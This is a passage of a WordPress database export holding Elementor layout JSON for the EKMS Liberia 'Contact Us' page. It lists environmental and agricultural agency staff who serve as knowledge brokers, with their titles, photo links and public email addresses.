23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24629,3641,'_elementor_edit_mode','builder'),(24630,3641,'_elementor_template_type','wp-page'),(24631,3641,'_elementor_version','3.0.16'),(24632,3641,'_wp_page_template','default'),(24633,3641,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a 